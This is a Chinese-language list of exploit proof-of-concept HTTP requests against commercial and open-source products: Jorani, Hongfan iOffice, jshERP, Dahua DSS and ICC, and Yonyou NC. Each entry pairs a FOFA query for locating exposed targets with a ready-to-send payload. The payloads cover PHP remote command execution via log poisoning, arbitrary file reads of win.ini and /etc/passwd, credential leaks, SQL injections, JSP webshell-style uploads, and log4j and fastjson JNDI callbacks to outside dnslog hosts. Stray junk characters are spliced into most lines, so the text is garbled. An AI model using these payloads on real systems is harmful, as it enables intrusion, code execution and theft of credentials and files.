- t2 W" l1 E2 N) }, ?! t7 K" O$ L. }GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
% b, l3 y0 N3 Q$ r& [* iHost: 127.0.0.1# K- M7 k- N: |
Pragma: no-cache
4 w# h6 A8 o$ g- a% kCache-Control: no-cache
$ L- s m- [* ?" ]3 _; P, [Upgrade-Insecure-Requests: 1( l( V* I3 X6 h1 d; M* K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
( P5 i# T2 Z) D- L2 l; `' {5 XAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
& v5 i" W! a4 x* E* L& V' N/ |Accept-Encoding: gzip, deflate3 g9 Q1 Y4 t; g) d! k* |
Accept-Language: zh-CN,zh;q=0.9,en;q=0.87 j* K8 n6 V+ }% [$ D5 d% u( O
Connection: close
; a) W/ t/ c" ~! K+ w' O" e
4 f& a( w- f4 t6 j* a$ v5 x& y5 w q% E+ x" u
12. Jorani < 1.0.2 远程命令执行
% ]; z3 F1 U$ d3 I; KFOFA:title="Jorani"
* [7 ^* L2 r; V; k# E( v第一步先拿到cookie
4 ^0 V8 d4 J0 W, |, r/ Z+ N+ rGET /session/login HTTP/1.1
! b- [% v L2 w& k, b- g% PHost: 192.168.190.30+ o! q" r. b, R& M- a
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.361 U1 ~& q% M) C |
Connection: close. i1 E9 q% R+ W3 `; `3 [. q
Accept-Encoding: gzip! V7 y! p$ t( M. D/ X
" p! P" `. v' `# `% {" e& ~0 U/ C" ~- s. p) ]) D# G
响应中csrf_cookie_jorani用于后续请求% ~( p. Y* S6 X. R% d5 q- m
HTTP/1.1 200 OK
2 V, G& y* ~# e0 G# J' G& M! tConnection: close
0 ^- c% B0 T! aCache-Control: no-store, no-cache, must-revalidate4 l* @4 V/ g# N/ g# K
Content-Type: text/html; charset=UTF-8
: s2 B( v2 N2 ^+ m1 ]Date: Tue, 24 Oct 2023 09:34:28 GMT& }$ f6 K0 k0 k& {: L" a2 a( O
Expires: Thu, 19 Nov 1981 08:52:00 GMT
! I/ w; l3 }7 ZLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT
e7 C3 T4 \$ ]2 \% X6 QPragma: no-cache
a2 n, x2 k6 j |) M9 kServer: Apache/2.4.54 (Debian)
* Z2 W! o4 B9 G; p; A' GSet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
4 ?! b+ _5 m1 u3 \Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
/ |! R4 n8 D& ?; h# WVary: Accept-Encoding4 x* Z; L; `0 ]! r2 v
6 w% j7 x: |8 n! E
( ]( o7 G \" {" o
POST请求,执行函数并进行base64编码
. a2 k$ D' ^+ K) f# o/ b5 PPOST /session/login HTTP/1.1, h7 a+ f/ D/ y1 A
Host: 192.168.190.30
6 ]1 Y) u% n, a! O qUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
$ h+ V9 R+ D% d# X. v2 xConnection: close% a% W8 S! p* s+ t
Content-Length: 2523 h Q' N$ \3 V7 h1 H, {- E' z8 D
Content-Type: application/x-www-form-urlencoded1 A* C1 \2 e" F/ z
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
$ A0 v A" f" j' B" jAccept-Encoding: gzip( a4 a" f0 q7 s6 V, U' @% f
1 p5 q! a$ x. V: \csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
: y' K( L8 e( ~6 Z' l. j+ E, Q) r* u. A' U. R/ u& P$ {5 n
" \+ e1 f. E$ V0 k, T: ^9 x
2 M& K0 j& N+ k" ]5 a向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
% y/ V: e ]1 s9 G4 cGET /pages/view/log-2023-10-24 HTTP/1.1
. m* C- L( H& {! k0 iHost: 192.168.190.30/ t4 E9 X0 `6 Z) T% |. v( \2 b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36& o6 P* ?! V1 T! N& } a
Connection: close
6 Y% Y5 g T% [* A6 b9 Z3 m$ tCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r" `5 X4 s! `# S1 j- j; X0 K/ l3 b
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
: O) e& |. R3 D# M AX-REQUESTED-WITH: XMLHttpRequest
9 N6 \, \0 s1 w5 w8 c1 X# vAccept-Encoding: gzip
: r, v7 R( y3 C: {& Y- o
l5 q6 ] G& q# O1 ~$ [" h# q
/ [9 ]3 h7 v- ]. S {# ]13. 红帆iOffice ioFileDown任意文件读取; {5 _" T; e/ g6 n
FOFA:app="红帆-ioffice"" }3 g1 o9 U- R
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1! u ^& \, t- Q) |0 W
Host: x.x.x.x4 T+ p7 Q" H% j) \; G
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
, _ _4 ~% ^* ~: \. c* EConnection: close
. g0 e2 A" G- ~1 vAccept: */*$ [, @! }+ V; W; t
Accept-Encoding: gzip
! m" {) u/ O# P: @
; `, d. I1 I1 k! x. x2 t3 `5 ~
* ]4 p- P5 ~1 u7 j# I' G7 s14. 华夏ERP(jshERP)敏感信息泄露
* y2 e* q8 E# T) w6 b3 VFOFA:body="jshERP-boot"
( D! A7 k0 ~6 l, W% P5 D' v5 j泄露内容包括用户名密码0 v1 n! b' |, h4 d( C5 k$ n- ~
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1# ^( }3 T; `& a% y, m4 u/ U
Host: x.x.x.x
. h1 P! `$ r+ W: f: N4 gUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36, c4 ~) u; \$ T
Connection: close
9 D/ B1 c; Y1 Q' o9 _Accept: */*
+ F4 X* U0 \8 JAccept-Language: en
/ Q" c! n. O; u) wAccept-Encoding: gzip
0 I! ]" r0 ~6 P; W D; p
- Q) a: b& g1 U* Q' I8 |% b; k3 u1 c
15. 华夏ERP getAllList信息泄露/ X8 F$ j1 l$ i1 W) L# g* H0 M5 F4 E
CVE-2024-0490* t$ a1 G) c) z* h2 u/ S( y& u+ r" H* Y
FOFA:body="jshERP-boot"
" g7 O/ h4 f. g$ p' Y0 V% \泄露内容包括用户名密码
+ U1 q4 R1 Z+ p& AGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
: m/ I, s7 k9 I/ m* YHost: 192.168.40.130:1005 i/ T$ ?7 ^& B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
/ ]% W+ H9 H* k# v# l: r4 aConnection: close) ]# E5 ?1 W( [1 n" y0 J
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.80 P9 e: M. V* e8 J$ k. L
Accept-Language: en
" S# K& P: \# O. ysec-ch-ua-platform: Windows( ^% I) L* _ D1 J$ N
Accept-Encoding: gzip7 R) Q: J0 \) c: B4 F Z, `
/ ~, J3 U$ s/ I) j7 k; V
7 y: ^3 @" [- I* s; F3 a6 G" F
16. 红帆HFOffice医微云SQL注入
) z8 |# m' F0 K7 M% v6 wFOFA:title="HFOffice"
* s2 b6 ]2 H, B5 l4 `4 H8 }3 Fpoc中调用函数计算1234的md5值
) M: g* e0 G8 q1 VGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
! g |8 `& o" {( ]$ xHost: x.x.x.x# n( X, I4 ^9 I5 v" v! L4 ^/ M: C! M
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36 J; C+ _7 [! h4 X1 L: d7 y$ @: C
Connection: close" j! Y d, D# A0 v7 `8 w! r/ L; B
Accept: */*
7 Q; a9 ]" n$ v) X$ X z' g6 y/ ZAccept-Language: en9 f9 B! D4 M, p" I5 t* z7 S5 O9 A
Accept-Encoding: gzip
. L+ r, R4 ?( M/ p5 [$ U/ ^/ I! C$ W
1 Y3 b4 y% s: s2 n/ j; [7 h7 Y' |" H# H- @& \9 I
17. 大华 DSS itcBulletin SQL 注入3 O! F2 i# k% H; {& i
FOFA:app="dahua-DSS"3 r1 W& U' o! Z/ V
POST /portal/services/itcBulletin?wsdl HTTP/1.1& v1 s/ M, R: j
Host: x.x.x.x
# ~: \0 B, I; y: GUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15& u7 q; m W: f. ?" e/ m& ^& U
Connection: close% z" P$ b$ }% ~' W# M
Content-Length: 345
( A* S0 @! q2 }, |* vAccept-Encoding: gzip$ K U9 s* _& j* O$ f- X8 f0 y
?" _7 q+ V/ F4 W+ R5 Q
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>9 I( @$ Q7 q8 s* l9 ?# R! y
<s11:Body>, ?% g6 A( l1 W/ V
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
5 | H& ~ a( g# i4 v; S <netMarkings>2 i9 K* c6 z5 P# |" E1 c
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
- S q, O2 Q* I* @ </netMarkings>0 f/ U9 O9 f6 U- Z0 r9 B
</ns1:deleteBulletin>
) W! U- E3 i7 N1 z2 z& H </s11:Body>
U' r: [- j) G" ~- g7 A</s11:Envelope>
* l# t+ y. G6 D& K5 T0 f
5 F- F1 T1 i+ X5 u1 j$ T
6 `- n0 e6 h( d+ T! {5 R18. 大华 DSS 数字监控系统 user_edit.action 信息泄露& P. D* Z$ q! n9 F6 o. b
FOFA:app="dahua-DSS"+ A# E/ X% _+ H8 e [1 p
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
* Y8 q$ L% I! b, h. ]) B0 HHost: your-ip
7 l2 `& _: J1 ^- SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
2 M2 X( k* D! ^% l( T: v7 y, ~Accept-Encoding: gzip, deflate+ o9 Z R% g) z) n0 [" K3 }; p
Accept: */*7 q# Q' x% ~) @% b" q$ O
Connection: keep-alive
* u/ E/ v* U/ a9 N6 S3 I4 k" F( `6 F5 d3 k' }5 m
% F0 _( U& f8 G. L) z6 E1 X9 @6 v: F
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
! Z& Z* K/ Y4 E. k2 A0 Q KFOFA:app="dahua-DSS"( e5 c* Z! N9 W3 ]9 B3 b; W! _
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1; O# i# \) f) h: y7 f7 y
Host:$ d) k" ?: C% Z, q# C& z& e
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" m9 w# F1 @4 C4 J9 M! p) c( F1 z
Accept-Encoding: gzip, deflate1 U4 p* r5 G [3 C% V
Accept: */*
' z# Y7 q$ q7 u( e- dConnection: keep-alive
8 {, b3 ?$ F0 y& K! F0 ?; w$ h* s8 @/ I) J
9 t9 Y9 ~5 e2 l" i- w- \5 d20. 大华ICC智能物联综合管理平台任意文件读取7 i# n4 M- R) j$ Q4 s
FOFA:body="*客户端会小于800*"8 M) y7 H$ N2 I: l3 }7 t# e, d+ `
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1* O l( ?. j! ~+ h2 k
Host: x.x.x.x* Y, Q, g; w, h( N1 f! b
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
) k( b0 f9 l; F# Z# _0 sConnection: close
D1 d( h; D* [4 l( XAccept: */*
% x* y# e- a& nAccept-Language: en
6 s M. G; x- t' U4 a8 cAccept-Encoding: gzip
5 m7 g( l/ h& n# c& S$ q8 s) M. d& [( n m
2 j/ |+ `9 U. P, C9 n# P21. 大华ICC智能物联综合管理平台random远程代码执行
+ W/ F" ~) X2 Q( j( c1 S3 ~FOFA:icon_hash="-1935899595"& Z6 r/ ?& \0 C7 R p: N
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
: w- F% V* C$ ^' k1 _+ BHost: x.x.x.x
: t! F3 _! T2 C! t7 {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 l5 U0 f) k9 U. ~% i- O" J4 J/ a* D
Content-Length: 161
( s0 ]* R% v8 ~( f4 s' N1 m7 c3 w/ g; `Accept-Encoding: gzip1 q" J6 u+ ?4 i8 Q3 {5 g3 f
Connection: close7 K% ]$ i" @+ l4 C( |
Content-Type: application/json;charset=utf-8
. D" m9 z- s6 L0 R8 v2 s n% |' a5 K/ m! G) S @1 K9 r* b: S
{; U }4 g( E; R5 |! ?, c
"a":{+ v2 X! q, h# L, O- i# C! T
"@type":"com.alibaba.fastjson.JSONObject",8 o, {; ?; f( K) e
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
% M0 m% _8 p& x& V# m }""' K F" x9 }/ c1 I: o: F
}
# Y E) v& {0 y7 M0 i% [# B! Q5 q
& e: v. |% K+ w+ ?
: u2 D, P: l+ Q5 o. p22. 大华ICC智能物联综合管理平台 log4j远程代码执行
& H" W, H( u% @( QFOFA:icon_hash="-1935899595"
# i k& m$ s1 G- l. NPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
1 ^$ s! }5 u5 ]Host: your-ip
. B* V7 v( Y& `9 H" J5 Y2 ]1 I# d2 EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
/ z! ~, ^5 `+ A7 Y2 H7 @8 d9 fContent-Type: application/json;charset=utf-8
3 C0 m7 S4 a! K' Y+ v6 Y% {: ~0 }
/ z3 S4 o Q" K* A! q{, T" y" R/ I5 N. d
"loginName":"${jndi:ldap://dnslog}": T$ T X# D( [8 Z+ w
}
1 u* y# e' T+ d' i8 {' Q `, ?4 l2 V% Y4 s3 x; _
0 E* a+ q$ l6 O4 r( t% Y
" o7 O: ?* Q4 N- O2 V23. 大华ICC智能物联综合管理平台 fastjson远程代码执行$ x9 I* P5 ^1 v' l
FOFA:icon_hash="-1935899595"0 p! ]* c2 F* V
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
# I, v! ]/ {' b3 s! l: QHost: your-ip
4 ?/ i/ m1 y5 o0 T9 X( I8 {6 [8 NUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15: [9 n2 s3 g1 A9 H5 d6 U
Content-Type: application/json;charset=utf-8% y# E- u8 F- {; z1 l7 f: A
Accept-Encoding: gzip
( N2 O4 H, z9 ^Connection: close0 C0 u# C9 ?3 ^, K. c! g( v
' B3 P$ K. T1 `" R+ h$ E
{# f2 X) h& k! h5 k
"a":{
i1 |. J9 F. [7 K! w& l' D "@type":"com.alibaba.fastjson.JSONObject",* K _, E9 w) g, D* l* ^
{"@type":"java.net.URL","val":"http://DNSLOG"}/ G; t2 [5 g; L: c0 i
}""
r8 s8 j& \8 R% A3 X7 C( E}4 Q) |3 f O" z3 m
, X( X [/ L& N- y4 K1 @) x& Y. `5 p0 e& H8 r9 ]8 [4 v, c
24. 用友NC 6.5 accept.jsp任意文件上传
8 }* W2 N% j: X6 v% bFOFA:icon_hash="1085941792"
/ r, A* Q0 |( TPOST /aim/equipmap/accept.jsp HTTP/1.1
! c9 w0 ?+ a* O& gHost: x.x.x.x
5 A# E/ I y% |% l7 d1 yUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.360 R. P5 _ |) u# L
Connection: close z9 T& Y5 @' P
Content-Length: 449
% i. o, _! w2 e/ [3 @Accept: */*
- N. J2 q; `" g: fAccept-Encoding: gzip& C- Z" d4 h3 \; V+ b U
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc/ o* H: } b" [- x4 O$ s) G
% i8 Z9 M6 I2 F8 o, n% e
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc, N) c2 ?% H2 I) D8 |; j6 u
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"% i! o# `* B2 W# I. }' C( [; ~
Content-Type: text/plain
* i$ R7 Q% ^/ M- a; G ?
8 i8 E) Y) C5 s3 h2 O<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
% Y d9 I) g9 P6 u4 X9 ]-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc) C/ f9 G* i' m8 A" r1 ]4 d3 X
Content-Disposition: form-data; name="fname"
- [' _7 d& A; Z$ M% [3 U
6 r' Y/ ]7 `! d; l2 ?\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp- K1 X: k9 p3 Z0 v5 }
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
. R; f& I, k# a( H/ F& W
( R1 X4 X9 G- t
5 i6 F& X \/ S0 ]25. 用友NC registerServlet JNDI 远程代码执行
e+ d8 r' c4 m/ {FOFA:app="用友-UFIDA-NC"- u/ E) O! }6 G5 f9 s; f' f
POST /portal/registerServlet HTTP/1.1
2 }# G- B2 |1 R1 lHost: your-ip
- u( _# \1 T' k) [% LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 X8 ` Z& p \$ ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.90 ]- F" E% s0 p: V$ {) Y% K* M
Accept-Encoding: gzip, deflate
K9 `9 Q" L! p" k1 Q3 l. e9 }Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
- h9 r5 Q% y0 X" N% fContent-Type: application/x-www-form-urlencoded1 a9 V0 S: ~4 \5 l
8 h, G5 K* G3 R3 A$ X* m; T8 M6 x
type=1&dsname=ldap://dnslog
- D6 ]2 h! {( g) S1 Q# I3 z) i) N' U6 A% c
0 e3 z# J9 m6 q# L3 ^
) j4 h) {/ q2 ?' U% z9 X% V/ G26. 用友NC linkVoucher SQL注入, `6 z# Q2 a: G( l1 H" n
FOFA:app="用友-UFIDA-NC"
- }2 X& m* N F" a/ GGET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1. P) h5 `& }4 w x7 y4 @1 i, h4 i
Host: your-ip
5 R4 q& T$ P' AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36! [! M% V4 d, @! M- r# W$ q5 P! e
Content-Type: application/x-www-form-urlencoded
/ d$ @! ^ D l0 ^9 a) d8 {9 kAccept-Encoding: gzip, deflate
+ \$ S) j8 Z- L8 H0 K% _# s: n: LAccept: */*
/ H- j1 r/ q- C9 ~ pConnection: keep-alive4 e8 C* [3 W1 e4 o5 `3 T
+ @5 D4 Q* k# q' x
" ~2 o; l# l1 E) o; V9 \
27. 用友 NC showcontent SQL注入& y- m/ Q+ l$ S# [3 h! V
FOFA:icon_hash="1085941792"
- z j9 `6 g" E; {: f) mGET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
! q1 C8 V& Z4 }& P$ B& v& [Host: your-ip
' B2 Y Q" [) d8 Y* M, F- o5 pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
) U% b& k7 {/ o7 h$ o0 l: wAccept-Encoding: identity% l' D! G$ i4 D
Connection: close5 e; x$ X# h+ L7 D- m3 i
Content-Type: text/xml; charset=utf-8
" \. A w' U. G. j8 m& `8 y# |% F/ G; t* b+ c8 o# S
, L& u# L0 X3 _! C& a28. 用友NC grouptemplet 任意文件上传
1 R" e+ W0 P- L4 G9 ~6 i8 @& ]FOFA:icon_hash="1085941792"
9 N% A* G- |6 n) O( @POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
& k$ t9 `5 f& k6 Q7 z- MHost: x.x.x.x
' y5 @ D( J3 UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
/ n7 G9 S$ C( \* @/ ^3 aConnection: close
7 U9 G" c# o0 OContent-Length: 268- k/ r: X7 y, x1 c# N
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk2 @5 h2 M$ `3 ?) Q8 n5 X7 |
Accept-Encoding: gzip! z' d3 v& B( y. I' I
4 J* D7 e7 m3 F6 l; T/ Y
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk* N# T% t+ T5 R0 l# K! L- t
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
* g- M) x; ]4 A- ?7 oContent-Type: application/octet-stream
, g! @6 E& ^6 S& b
" N2 I8 n9 H7 c" \+ y- p) M<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>, w% t I! H' I& Z9 O
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
. m/ I; @( t( E. H) f, c( m7 {, L5 ^' G- M# M7 D* b5 W# a
" [6 S0 X4 e& M1 a7 H/uapim/static/pages/nc/head.jsp
; }+ y7 ]. l/ y0 _, m3 K
( _ m K/ Y2 w) T$ N+ O. s, j29. 用友NC down/bill SQL注入6 s# v& {% x, I; Y- S& M: H
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"8 e- k6 H( A$ H- X2 L' Z- q8 j
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
1 n q1 f6 p: hHost: your-ip
" i3 [9 S" {' F8 `6 zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36% `* p0 N5 z& K$ G6 P
Content-Type: application/x-www-form-urlencoded2 _8 ]" g# x$ R B6 {: r$ u
Accept-Encoding: gzip, deflate
2 [* g7 }# j# n7 [6 B( Y: |; ~Accept: */** \; x* {* W1 V9 M( A* a
Connection: keep-alive7 y1 K" L, s, A
2 ?$ o. W$ w2 x: M* Q! f/ o
0 m# g9 L; t/ F, I, @) Q30. 用友NC importPml SQL注入
. z# ~3 U$ L" a8 d. xFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
7 a; D8 q7 R( R1 F3 @1 Q( [0 T0 b) XPOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
2 `5 l+ B" d* ]& X9 XHost: your-ip
/ ]8 E B, m6 q+ `2 o+ DContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
1 J% w! B4 X( p3 C! q( [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
" A9 B i" J/ m7 [3 S2 e g8 X8 iConnection: close6 X) p* D" I8 E R2 ~
" V$ W0 r5 E, b: \$ x: v
------WebKitFormBoundaryH970hbttBhoCyj9V# K0 G. t1 _0 d6 S
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
; U" v& m4 \0 V* M& A' w# o) JContent-Type: image/jpeg
, F$ V/ }' x7 s* [$ |------WebKitFormBoundaryH970hbttBhoCyj9V--
0 V7 w2 C K# H+ ]+ _, f( R1 q# L& b3 r$ d' e# L
$ u7 e R+ K/ x& O2 U8 ? c. C
31. 用友NC runStateServlet SQL注入' W) X& F$ z4 P" V2 ~6 N$ U
version<=6.5
* B2 V3 P* J& ~4 OFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"/ m; k" J& ]1 @2 Y
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1% Z: b$ i& J5 v- R
Host: host
, D1 Q0 q D* w! SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
3 m3 R, a9 b) c4 e$ ]0 o) kContent-Type: application/x-www-form-urlencoded3 {" |) A: w9 d9 u* }& S
2 z/ C, |7 n/ p" d0 w: D1 h
: O6 @* D G/ @+ O# Z9 l' h32. 用友NC complainbilldetail SQL注入$ w' V1 O( J# S7 l
version= NC633、NC65: M2 f% U) m" S: u) }
FOFA:app="用友-UFIDA-NC"
1 {# s3 v7 \) c. CGET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
3 F- U* J+ G: n+ YHost: your-ip
4 w1 e7 Q4 |, a- N, SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5 }" G1 n$ T9 L+ tContent-Type: application/x-www-form-urlencoded" R0 ?9 S0 I4 }2 P W
Accept-Encoding: gzip, deflate
$ s+ r+ a- u( t& ~/ T* y$ a @Accept: */*2 q! j' B3 z' h" O
Connection: keep-alive( I5 {# [! f8 q: _ y4 W
. ^( O) N2 K; e# u" V" _3 Z
4 J8 C5 n, ?0 a$ [7 L* J# o6 s33. 用友NC downTax/download SQL注入) l7 o6 ~4 Q- b _9 D4 J$ U
version:NC6.5FOFA:app="用友-UFIDA-NC"1 v# N# k* \. Q9 ^4 _
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.19 `$ V# T( g5 _$ p" X6 E
Host: your-ip
. @2 H d( L3 t% c( m6 U" }User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" Q- X j; p* y9 T5 z. a
Content-Type: application/x-www-form-urlencoded
* N4 r. l, ?7 z; ~5 W9 jAccept-Encoding: gzip, deflate
) _# ?& e# _% `# n( NAccept: */*" W# L& K W5 O! Y, e9 f* L9 \& O
Connection: keep-alive
9 v( o" J( u5 K1 o" t
T3 G7 v3 X: T* S+ S I( @5 U; R5 M/ x& W
34. 用友NC warningDetailInfo接口SQL注入
B' T& Z( n; U- r/ x1 r( ~FOFA:app="用友-UFIDA-NC"- I' X; ]% ?1 a/ W
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
9 Z7 M h- G, t+ T; A6 @ YHost: your-ip( B; d2 ]5 m7 W3 t! a0 v' K1 I! D) r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.361 Y9 s6 h+ k- k3 w& |
Content-Type: application/x-www-form-urlencoded( Z: C6 g2 b' C! o' n: a+ U
Accept-Encoding: gzip, deflate
; o3 b( ?; u/ o" u- m i& @Accept: */*
( t# H6 T0 D5 q- ?9 _Connection: keep-alive& T8 d$ K z2 ^# C" c
0 d g, u( O/ H4 |# {
0 U0 K0 X" [+ G* h
